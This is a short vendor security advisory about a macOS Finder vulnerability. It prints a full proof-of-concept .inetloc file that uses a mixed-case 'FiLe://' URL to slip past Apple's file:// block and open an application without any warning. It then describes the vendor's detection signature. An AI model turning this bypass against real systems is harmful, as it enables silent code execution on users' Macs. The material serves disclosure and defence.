Description
The Finder app in macOS is a gateway to all of the files, apps and downloads on a Mac.
Vulnerability
An independent security researcher, Park Minchan has discovered a vulnerability in macOS Finder which allows .inetloc files to execute arbitrary commands. An attacker can run any commands embedded in an .inetloc file without any warnings or prompts.
Identification
The proof of concept code shows the contents of a .inetloc file that can be used to exploit this vulnerability. Newer versions of macOS, from Big Sur onwards have blocked "file://" but they failed to consider upper and lower case variations.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>URL</key>
<string>FiLe:////////////////////////System/Applications/Calculator.app</string>
</dict>
</plist>Detection
By turning this into a traffic file and matching rule, we are able to detect attempts to exploit this vulnerability to execute arbitriary commands.
Coverage
Idappcom has created signature 8021815 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here https://www.idappcom.co.uk/traffic-iq-professional